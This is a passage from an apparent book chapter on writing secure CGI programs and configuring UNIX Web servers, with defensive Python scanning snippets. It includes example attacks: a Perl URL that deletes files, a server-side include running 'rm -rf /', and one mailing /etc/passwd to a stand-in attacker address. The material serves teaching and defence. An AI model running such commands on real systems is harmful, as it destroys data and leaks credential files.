Unless you've programmed network software in the past, security has probably been the least of your programming concerns. After all, you don't need to worry about writing insecure programs on a single-user machine because, presumably, only one person has access to the machine anyway.
However, programming software designed for use over the Internet requires a different paradigm of programming with a much greater emphasis on security. There's an old computer maxim that says the only way to truly secure a computer is to disconnect it from the rest of the world and keep it in a locked room. Simply connecting the machine to a network weakens your machine's security.
This especially holds true for a large-scale "network of networks" like the Internet, where literally millions of people potentially have access to your computer. Many of the services on the Internet, especially the World Wide Web, were designed so that other people could easily access information from your computer. Each of these services you make available (either consciously or inadvertently) is another possible door for a wily, malicious user to exploit. A badly written network server can be easily broken into, potentially giving someone access to your entire machine and your important data.
What do I mean when I say that every network service you provide is like another door on your system? What exactly constitutes a security breach? For all intents and purposes, a security breach is when a person gains unauthorized access to your machine. "Unauthorized access" can mean many things ranging from running a program on the server not meant to be publicly run to obtaining root access on a UNIX machine.
You are largely dependent on the knowledge and carefulness of the programmers who wrote the network servers for security. After all, one cannot expect you to have to carefully sift through thousands of lines of source code simply to make sure there are no security holes in the software; for the most part, you depend on the reliability of the programmer and other experts who have sifted through source and carefully tested the software. While past incidents such as the Internet Worm have demonstrated that you cannot completely trust programmers to write perfectly secure code, you can take steps to minimize the risk.
Later, in "Securing Your Web Server," you learn about Web server security. For the moment, assume your Web server software is secure and properly configured; that is, no one can gain unauthorized access to your machine through your Web server alone. Why is it important to write secure CGI scripts? CGI is a generic protocol that enables you to extend the Web server. By writing a CGI program, you are adding functionality to the Web server, functionality that might inadvertently introduce new security holes. A carelessly written CGI application can allow anyone full access to your machine.
When users submit a form or access a CGI script in another manner, you are essentially allowing them to run an application remotely on your machine. Because many CGI applications accept some form of user input (either through a fill-out form or from the command line), to some extent you are allowing users to control how the CGI application is run. As a CGI author, you need to make sure that your CGI script can be used only for its specified purpose. This chapter goes over related Web-security issues and provides in-depth information on writing secure CGI programs. At the end of this chapter, you also learn how to author CGI for secure transactions.
Overall security of your Web serving machine depends on many factors. A secure CGI program is useless if your server is misconfigured or if there are other holes on your system. I discuss some of the related Web security issues here and explain how to properly configure your Web server for CGI.
A common question is which platform is more secure for a Web server: a Macintosh running System 7, a UNIX workstation, a PC running OS/2, and so on. There have been many wars on this topic, each of which reflects people's different biases toward different operating systems.
No operating system is clearly more secure than another. UNIX is arguably more secure than a single-user platform such as a Macintosh or a PC running Windows, because once a user breaks into one of these latter machines, he or she has access to all your files. UNIX, however, has a fundamental understanding of file ownerships and permissions. If your server is configured correctly and is owned by a safe (for example, non-root) user, then if someone unauthorized breaks in, he or she can do only limited damage. Limited damage, however, can be bad enough, as you will see in the examples later in this chapter.
On the other hand, because UNIX often comes preconfigured with many different types of network services such as mail, FTP, Gopher, WWW, and so on, there are more potential "doors" for someone to enter. Securing all of these services is a difficult and time-consuming process, even for the experienced administrator. Even if you configure everything correctly, you are still at the mercy of possible bugs in each individual package. Security flaws in various packages are not uncommon, as is clear from the frequency of notices of insecurities in various common UNIX network services from organizations such as the Computer Emergency Response Team (CERT).
Every platform has its own security implications, but no one platform is more secure than another. Although you should be aware of the implications of each operating system, security should not be your primary criterion when choosing a platform. Choose your platform, seal off the holes associated with that platform, and then configure your Web server securely and correctly. Only after you have completed these steps should you concern yourself with writing secure CGI scripts.
The first step for writing secure CGI scripts is to make sure your Web server is securely and properly configured. If your Web server is not secure, it does not matter how carefully you write your CGI scripts; people can still break into your machine. Additionally, configuring your Web server correctly helps minimize the potential damage of a badly written CGI program.
You should have three goals when securing your Web server:
The more I know about your computer, the better equipped I am to break into it. For example, if I know the directory or folder in which all of your sensitive, private information is stored, I have narrowed my objective from gaining total access to your machine to simply gaining access to one directory, usually a simpler task. Or if I have access to your server configuration files or the source code of your CGI scripts, I can easily browse through them looking for potential security holes. If there are holes in your system, you don't want to make it easy for others to know about them, and you want to find them before others do.
As discussed earlier in Chapter 2, "The Basics," most Web servers enable you to run CGI programs in many different ways. For example, you could designate a specific directory as your cgi-bin. Alternatively, you could allow CGI to be stored in any directory.
There are advantages and disadvantages to both, but from a security standpoint, it is better to designate one directory to store all of your CGI applications. Having all of your programs in one directory makes it easier to keep track of all of the applications on your server and to audit them for potential security holes. It also helps prevent tampering. If your scripts are located in several different directories, you need to constantly check each one of these for tampering.
If you tend to use a scripting language (such as Perl) for most of your applications, then the source code is contained within the application itself. This code, then, is potentially vulnerable to being read, and exploited, if you're not careful. For example, many text editors save backup files, usually appending some extension to the end of the filename (such as .bak).
For example, emacs saves backup files by appending a tilde to the filename (filename~). Suppose that you have a CGI script written in Perl (program.cgi) stored in one of the Web data directories rather than in a central designated directory. Now suppose that you made a trivial change to the program using emacs and forgot to remove the backup file. You now have two files in your directory: program.cgi and program.cgi~. The Web server knows that files ending in .cgi are CGI programs and will run the program rather than display its content. However, a smart user might try to access program.cgi~ instead. Because it does not end in .cgi, your Web server sends it as a raw text file, thus allowing the user to search your source code for possible holes. This reveals more information than necessary, which violates the first maxim.
However, if your server enables you to specify all files located in a certain directory as a CGI, it doesn't matter what the extension of the file is. So in the same example earlier, if the backup file were located in a properly designated directory and a user tried to access it, the server would try to run the program rather than send the source code.
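The backup-file problem described above can be checked for mechanically. What follows is a minimal sketch, written in Python purely for illustration; the function name find_backup_files and the list of suffixes are my own assumptions, not part of any server package, and the list is certainly not exhaustive.

```python
import os

# Suffixes that editors commonly append to backup copies.
# This list is an illustrative assumption; extend it for your own editors.
BACKUP_SUFFIXES = ("~", ".bak", ".orig", ".swp")


def find_backup_files(root):
    """Return sorted paths under root whose names end in a backup suffix."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            # str.endswith accepts a tuple and matches any of its members
            if name.endswith(BACKUP_SUFFIXES):
                hits.append(os.path.join(dirpath, name))
    return sorted(hits)
```

Running find_backup_files over your document tree from time to time should turn up stray files such as program.cgi~ before a curious visitor does.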
Note that designating a central directory as the location of all CGI programs on your server is limiting, especially on a multiuser system. For example, if you are an Internet Service Provider and you want to allow your users to write and run their own CGI, you might be inclined to allow CGI to be stored in any directory. Before you do this, consider the alternative options carefully. Are your clients going to be writing a lot of special customized scripts? If not, it is better to have your clients submit the scripts for auditing before being added to the cgi-bin directory rather than enabling CGI in all directories.
Another issue regarding the location of CGI programs is where to put the interpreter. For interpreted scripts, the server runs the interpreter, which in turn loads the script and executes it.
Never put the interpreter in your cgi-bin directory, or in any directory in your data tree for that matter. Giving users access to the interpreter essentially gives them the power to run any application or any series of commands on your system.
This is especially important if you use a Windows or other non-UNIX operating system. In UNIX, you can specify the interpreter in the first line of your script. For example:
#!/usr/local/bin/perl
# this first line says use Perl to run the following script
In Windows, for example, there is no analogous method of specifying the interpreter within the script. One way to call a Perl script would be to create a batch file that calls Perl and the script:
rem progname.bat
rem a wrapper for my perl script, progname.pl
c:\perl\perl.exe progname.pl
However, you might be inclined to avoid creating this extra program by simply putting perl.exe in your cgi-bin directory and accessing the following URL:
http://hostname/cgi-bin/perl.exe?progname.pl
This works, but it also enables anyone in the world to run any Perl command on your machine. For example, someone could access the following URL:
http://hostname/cgi-bin/perl.exe?-e+unlink+%3C*.*%3E%3B
Decoded, the previous line is equivalent to calling Perl and running the following one-line program, which will delete all the files in the current directory. Clearly, this is undesirable behavior.
unlink <*.*>;
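If you want to verify the decoding yourself, the following short sketch (in Python, used here only as a convenient calculator) applies standard URL decoding to the query string from the malicious URL. The variable names are mine.

```python
from urllib.parse import unquote_plus

# The query string from the malicious URL shown earlier
query = "-e+unlink+%3C*.*%3E%3B"

# unquote_plus turns "+" into a space and each %XX escape into its character
decoded = unquote_plus(query)
print(decoded)  # prints: -e unlink <*.*>;
```

The -e switch tells Perl to treat what follows as program text, which is why the decoded string amounts to the one-line program shown above.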
You will never have a reason to put an interpreter in your cgi-bin directory (or any directory capable of running CGI), so never do it. Some Windows servers can determine the type of script by its extension and run the appropriate interpreter. For example, Win-HTTPD assumes every CGI script ending in .pl is a Perl script and will run Perl automatically. If your Web server does not have this feature, use a wrapper script like the first Windows Perl example earlier in this chapter.
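As a rough safeguard, you could periodically check your CGI directory for files that look like interpreters. The sketch below is in Python and rests on loud assumptions: the function name find_interpreters and the set of interpreter names are hypothetical, and the check looks only at filenames, so a renamed copy of an interpreter would slip past it.

```python
import os

# Base names of some common interpreters and shells.
# An illustrative assumption, not a complete list.
INTERPRETER_NAMES = {
    "perl", "python", "python3", "sh", "bash", "csh", "tclsh",
    "cmd", "command",
}


def find_interpreters(cgi_dir):
    """Return sorted names of files in cgi_dir that look like interpreters."""
    hits = []
    for name in os.listdir(cgi_dir):
        base = name.lower()
        # Strip a DOS/Windows executable extension before comparing
        if base.endswith((".exe", ".com")):
            base = base[:-4]
        if base in INTERPRETER_NAMES:
            hits.append(name)
    return sorted(hits)
```

An empty result does not prove the directory is safe; it only means nothing with an obviously dangerous name is sitting there.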
In Chapter 4, "Output," you learned a few reasons why you should avoid server-side includes. A common reason often raised is security. Specifically, some implementations of server-side includes (notably NCSA and Netscape) enable users to embed the output of programs in an HTML document. Every time one of these HTML files is accessed, the program is run on the server-side and the output is displayed as part of the HTML document.
By allowing this sort of server-side include, you become susceptible to a few potential security risks. First, on a UNIX machine, the programs are run by the owner of the server, not the owner of the program. If your server isn't properly configured and you have sensitive files or programs owned by the server owner, these files and programs and their output become accessible by users on your machine.
This risk increases if you allow users to edit HTML files on your system from Web browsers. A common example of this is a guestbook. In a guestbook, users fill out a form and submit messages to a CGI program, which will often simply append the unedited message to an HTML file, the guestbook. By not editing or filtering the submitted message, you allow the user to submit HTML code from his or her browser. If you allow programs to be executed in a server-side include, a malicious user can wreak havoc on your machine by submitting a tag like the following:
<!--#exec cmd="/bin/rm -rf /"-->
This server-side include will attempt to delete everything it can on your machine.
Note that you could have prevented this problem in several ways without having to completely turn off server-side includes. You could have filtered out all HTML tags before appending the submitted text to your guestbook. Or you could have disabled the exec capability of your server-side include (I'll show you how to do this for the NCSA server later in this chapter in "Securing Your Web Server").
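To make the filtering option concrete, here is a minimal sketch in Python. It escapes HTML metacharacters rather than stripping tags, which is one of several reasonable approaches; the function name sanitize_entry is hypothetical, and a real guestbook would apply it to every submitted field before writing to the file.

```python
import html


def sanitize_entry(message):
    """Escape HTML metacharacters so the message is stored as inert text."""
    # html.escape rewrites &, <, > and (with quote=True) both quote characters
    return html.escape(message, quote=True)


entry = sanitize_entry('<!--#exec cmd="/bin/rm -rf /"-->')
print(entry)  # prints: &lt;!--#exec cmd=&quot;/bin/rm -rf /&quot;--&gt;
```

Because the escaped text no longer begins with the characters that open a server-side include, the server should treat it as ordinary text, and a browser simply displays what the user typed.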
If you forgot to do either of these things, other precautions you should have taken would have greatly minimized the damage such a tag could do to your machine anyway. For example, as long as your server was running as an unprivileged, non-root user, this tag would most likely not have deleted anything of any importance, perhaps nothing at all. Suppose that instead of attempting to delete everything on your disks, the malicious user attempted to obtain your /etc/passwd file, hoping to crack the passwords in it, using something like the following:
<!--#exec cmd="/bin/mail me@evil.org < /etc/passwd"-->
However, if your system was using the shadow password suite, then your /etc/passwd no longer contains the encrypted passwords and is of little use to potential hackers.
This example demonstrates two important things about both server-side includes and CGI in general. First, security holes can be completely hidden. Who would have thought that a simple guestbook program on a system with server-side includes posed a large security risk? Second, the potential damage of an inadvertent security hole can be greatly minimized by carefully configuring your server and securing your machine as a whole.
Although server-side includes add another potentially useful dimension to your Web server, think carefully about the potential risks, as well. In Chapter 4 I offered several alternatives to using server-side includes. Unless you absolutely need to use server-side includes, you might as well disable them and close off a potential security hole.
A secured UNIX system is a powerful platform for serving Web documents. However, there are many complex issues associated with securing and properly configuring a UNIX Web server. The very first thing you should do is make sure your machine is as secure as possible.
Disable network services you don't need, no matter how harmless you think they are. It is highly unlikely that anyone can break into your machine using the finger protocol, for example, which only answers queries about users. However, finger can give hackers useful information about your system.
Secure your system internally. If a hacker manages to break into one user's account, make sure the hacker cannot gain any additional privileges. Useful actions include installing a shadow password suite and removing all setuid scripts (scripts that are set to run as the owner of the script, even if called by another user).
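Finding setuid scripts by hand is tedious, so a small scan helps. The following Python sketch is one possible approach under stated assumptions: the function name find_setuid_scripts is mine, and it treats any regular file that has the setuid bit set and begins with "#!" as a script.

```python
import os
import stat


def find_setuid_scripts(root):
    """Return sorted paths of setuid regular files under root that start with '#!'."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                mode = os.lstat(path).st_mode
                # Only regular files with the setuid bit are of interest
                if not (stat.S_ISREG(mode) and mode & stat.S_ISUID):
                    continue
                with open(path, "rb") as handle:
                    is_script = handle.read(2) == b"#!"
            except OSError:
                continue  # unreadable or vanished entry; skip it
            if is_script:
                hits.append(path)
    return sorted(hits)
```

Files you cannot read are silently skipped, so run the scan as a user with enough access to see the directories you care about.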
Securing a UNIX machine is a complex topic and goes beyond the scope of this book. I highly recommend you purchase a book on the topic, read the resources available on the Internet, even hire a consultant if necessary. Don't underestimate the importance of securing your machine.
Next, allot separate space for your Web server and document files. The intent of your document directories is to serve these files to other people, possibly to the rest of the world, so don't put anything in these directories that you wouldn't want anyone else to see. Your server directories contain important log and configuration information. You definitely do not want outside users to see this information, and you most likely don't want most of your internal users to see it or write to it either.
Set the ownership and permissions of your directories and server wisely. It's common practice to create a new user and group specifically to own Web-related directories. Make sure nonprivileged users cannot write to the server or document directories.
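One way to confirm that nonprivileged users cannot write to these directories is to look for anything carrying the world-writable permission bit. This Python sketch assumes a UNIX-style permission model; the function name find_world_writable is hypothetical, and the check does not examine group write permission, which you may also want to review.

```python
import os
import stat


def find_world_writable(root):
    """Return sorted paths under root that any user on the system may write to."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                mode = os.lstat(path).st_mode
            except OSError:
                continue  # unreadable or vanished entry; skip it
            if stat.S_ISLNK(mode):
                continue  # permission bits on a symbolic link are not meaningful
            if mode & stat.S_IWOTH:
                hits.append(path)
    return sorted(hits)
```

Ideally the scan returns an empty list for both your server directory and your document directory.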
You will often hear that your server should never be "running as root." This is a somewhat misleading statement. In UNIX, only root can bind to ports below 1024. Because by default Web servers run on port 80, you need to be root to start a Web server. However, after the Web server is started as root, it can either change its own process's ownership (if it's internally threaded) or change the ownership of its child processes that handle connections (if it's a forking server). Either method allows the server to process requests as a non-root user. Make sure you configure your Web server to "run as non-root," preferably as an unprivileged account that owns no files, such as "nobody." This limits the potential damage if you have a security hole in either your server or your CGI program.
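The start-as-root, serve-as-nobody pattern can be sketched in a few lines. The Python below is an illustration only, not how any particular Web server is implemented; the function names lookup_ids and drop_privileges are hypothetical, and the account name "nobody" is assumed to exist on your system.

```python
import os
import pwd


def lookup_ids(username):
    """Return the (uid, gid) pair recorded for username in the password database."""
    entry = pwd.getpwnam(username)
    return entry.pw_uid, entry.pw_gid


def drop_privileges(username="nobody"):
    """Switch the current process from root to the named unprivileged account."""
    if os.getuid() != 0:
        return False  # not running as root, so there is nothing to drop
    uid, gid = lookup_ids(username)
    os.setgroups([])  # discard root's supplementary groups
    os.setgid(gid)    # change the group first; after setuid this would fail
    os.setuid(uid)    # from here on the process can no longer regain root
    return True
```

A server following this pattern would bind its listening socket to port 80 while still root and then call drop_privileges before reading a single request.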
Disable all features unless you absolutely need them. If you initially disable a feature and then later decide you want to use it, you can always turn it back on. Features you might want to disable include server-side includes and serving symbolic links.
If your users don't need to serve their personal Web documents from your server, disable public Web directories. This enables you to have complete and central control over all documents served from your machine, an important quality for general maintenance and security.
If your users do need to serve their personal documents (for example, if you are an Internet Access Provider), make sure they cannot override your main configuration. Seriously consider whether users need the ability to run CGI programs from their own personal directories. As stated earlier, it's preferable to store all CGI in one centralized location.
Finally, you might want to consider setting up a chroot environment for your Web documents. In UNIX, you ca